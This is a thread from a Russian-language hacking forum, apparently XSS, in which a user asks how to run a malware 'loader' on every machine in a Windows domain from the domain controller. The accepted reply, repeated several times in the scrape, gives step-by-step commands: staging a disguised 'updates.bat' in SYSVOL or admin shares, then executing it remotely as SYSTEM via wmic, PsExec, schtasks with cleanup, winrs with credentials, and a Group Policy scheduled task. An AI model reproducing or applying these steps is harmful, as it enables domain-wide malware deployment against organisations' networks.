• XSS.stack #1 – первый литературный журнал от юзеров форума

[HELP] How to run the loader on all machines by DC/AD???

ice80

313
Забанен
Регистрация
27.02.2021
Сообщения
195
Реакции
195
Гарант сделки
3
Депозит
0.001
Пожалуйста, обратите внимание, что пользователь заблокирован
Hello guys, I was wondering if there is any way to send a loader to all machines and run it directly from DC/AD. If yes, how could I do that?
my english sucks...
 
Решение
"Лоадер" он запускать на всех машинах домена собрался))) не смеши

Там же батник с обновами верно? ща будем патчиться

Залей свой "лоадер" на \\dc.domain.local\SYSVOL
или на все тачки в домене
copy updates.bat \\serve1.domain.local\c$\updates.bat
С дк запускай
session WMI:
wmic /node:server1.domain.local process call create "\\dc.domain.local\SYSVOL\updates.bat"

system PsExec:
psexec.exe \\server1.domain.local -s -d -accepteula C:\updates.bat

system schtasks:
schtasks /s server1.domain.local /RU "SYSTEM" /create /tn "loader" /tr "cmd.exe /c C:\updates.bat" /sc ONCE /sd 12/12/2022 /st 00:01
schtasks /s server1.domain.local /run /TN "loader"
schtasks /s server1.domain.local /TN "loader" /DELETE /F

creds winRM
winrs...
Hello guys, I was wondering if there is any way to send a loader to all machines and run it directly from DC/AD. If yes, how could I do that?
my english sucks...
 
Пожалуйста, обратите внимание, что пользователь заблокирован
"Лоадер" он запускать на всех машинах домена собрался))) не смеши

Там же батник с обновами верно? ща будем патчиться

Залей свой "лоадер" на \\dc.domain.local\SYSVOL
или на все тачки в домене
copy updates.bat \\serve1.domain.local\c$\updates.bat
С дк запускай
session WMI:
wmic /node:server1.domain.local process call create "\\dc.domain.local\SYSVOL\updates.bat"

system PsExec:
psexec.exe \\server1.domain.local -s -d -accepteula C:\updates.bat

system schtasks:
schtasks /s server1.domain.local /RU "SYSTEM" /create /tn "loader" /tr "cmd.exe /c C:\updates.bat" /sc ONCE /sd 12/12/2022 /st 00:01
schtasks /s server1.domain.local /run /TN "loader"
schtasks /s server1.domain.local /TN "loader" /DELETE /F

creds winRM
winrs -r:server1.domain.local -u domain\user -pw pass C:\updates.bat

system через груп полиси, все делаем с дк
залей updates.bat в c:\windows\sysvol\sysvol\domain.local\scripts на дк
проверь чтобы он был доступен по \\domain.local\netlogon\updates.bat
rightclick на group policy выбираешь edit
не помню что тут, user или computer configuration => preferences => Control panel => sheduled tasks => создаем новый
Action : Create
Program : cmd.exe
arguments : /c \\domain.local\netlogon\updates.bat

подтверждаешь, открываешь цмд вводишь gpupdate /force
екзешник запускается везде
 
Решение
Пожалуйста, обратите внимание, что пользователь заблокирован
"Лоадер" он запускать на всех машинах домена собрался))) не смеши

Там же батник с обновами верно? ща будем патчиться

Залей свой "лоадер" на \\dc.domain.local\SYSVOL
или на все тачки в домене
copy updates.bat \\serve1.domain.local\c$\updates.bat
С дк запускай
session WMI:
wmic /node:server1.domain.local process call create "\\dc.domain.local\SYSVOL\updates.bat"

system PsExec:
psexec.exe \\server1.domain.local -s -d -accepteula C:\updates.bat

system schtasks:
schtasks /s server1.domain.local /RU "SYSTEM" /create /tn "loader" /tr "cmd.exe /c C:\updates.bat" /sc ONCE /sd 12/12/2022 /st 00:01
schtasks /s server1.domain.local /run /TN "loader"
schtasks /s server1.domain.local /TN "loader" /DELETE /F

creds winRM
winrs -r:server1.domain.local -u domain\user -pw pass C:\updates.bat

system через груп полиси, все делаем с дк
залей updates.bat в c:\windows\sysvol\sysvol\domain.local\scripts на дк
проверь чтобы он был доступен по \\domain.local\netlogon\updates.bat
rightclick на group policy выбираешь edit
не помню что тут, user или computer configuration => preferences => Control panel => sheduled tasks => создаем новый
Action : Create
Program : cmd.exe
arguments : /c \\domain.local\netlogon\updates.bat

подтверждаешь, открываешь цмд вводишь gpupdate /force
екзешник запускается везде
thanks a lot for the help bro.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх